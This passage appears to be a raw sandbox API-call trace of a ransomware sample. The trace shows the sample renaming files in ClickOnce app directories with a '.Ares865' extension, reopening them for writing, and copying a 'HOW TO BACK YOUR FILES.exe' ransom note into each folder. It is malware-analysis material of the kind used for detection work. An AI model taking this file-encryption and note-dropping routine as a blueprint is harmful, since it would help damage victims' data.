(lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.ares865"), dwFlags=0x1) returned 1 [0104.317] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0104.317] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=15440) returned 1 [0104.322] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.cdf-ms.Ares865") returned 173 [0104.322] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.cdf-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.cdf-ms"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.cdf-ms.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.cdf-ms.ares865"), dwFlags=0x1) returned 1 [0104.324] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.cdf-ms.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.cdf-ms.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0104.324] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=17872) returned 1 [0104.329] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest.Ares865") returned 175 [0104.329] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest.ares865"), dwFlags=0x1) returned 1 [0104.332] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0104.332] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=14416) returned 1 [0104.335] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.cdf-ms.Ares865") returned 178 [0104.335] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.cdf-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.cdf-ms"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.cdf-ms.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.cdf-ms.ares865"), dwFlags=0x1) returned 1 [0104.337] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.cdf-ms.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.cdf-ms.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0104.337] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3808) returned 1 [0104.340] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest.Ares865") returned 180 [0104.340] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest.ares865"), dwFlags=0x1) returned 1 [0104.341] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0104.342] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1376) returned 1 [0104.355] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\GoogleUpdateSetup.exe.Ares865") returned 164 [0104.355] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\GoogleUpdateSetup.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\googleupdatesetup.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\GoogleUpdateSetup.exe.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\googleupdatesetup.exe.ares865"), dwFlags=0x1) returned 1 [0104.356] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\GoogleUpdateSetup.exe.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\googleupdatesetup.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0104.357] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1130328) returned 1 [0104.427] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715" [0104.427] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715" [0104.427] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.427] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.428] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.429] GetLastError () returned 0x0 [0104.429] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.429] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f4544a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f4544a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.429] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.429] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.429] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\GoogleUpdateSetup.exe.Ares865") returned 169 [0104.429] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\GoogleUpdateSetup.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\googleupdatesetup.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\GoogleUpdateSetup.exe.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\googleupdatesetup.exe.ares865"), dwFlags=0x1) returned 1 [0104.431] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\GoogleUpdateSetup.exe.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\googleupdatesetup.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0104.431] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1131104) returned 1 [0104.474] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\Data", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\Data" [0104.474] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\Data" [0104.474] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.474] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\Data\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\apps\\2.0\\data\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.475] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.475] GetLastError () returned 0x0 [0104.475] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.475] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\Data\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65fb9720, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f47a600, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f47a600, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.476] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.476] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.476] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\Data\\CJW3O3KP.BX7", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\Data\\CJW3O3KP.BX7") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\Data\\CJW3O3KP.BX7" [0104.476] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\Data\\CJW3O3KP.BX7" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\Data\\CJW3O3KP.BX7") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\Data\\CJW3O3KP.BX7" [0104.476] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.476] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\apps\\2.0\\data\\cjw3o3kp.bx7\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.477] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.477] GetLastError () returned 0x0 [0104.477] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.477] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65fb9720, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f47a600, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f47a600, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.477] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.477] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.477] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ" [0104.478] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ" [0104.478] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.478] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\apps\\2.0\\data\\cjw3o3kp.bx7\\6ng60cxz.9gj\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.478] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.479] GetLastError () returned 0x0 [0104.479] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.479] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65fb9720, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f47a600, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f47a600, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.479] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.479] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.479] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec" [0104.479] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec") 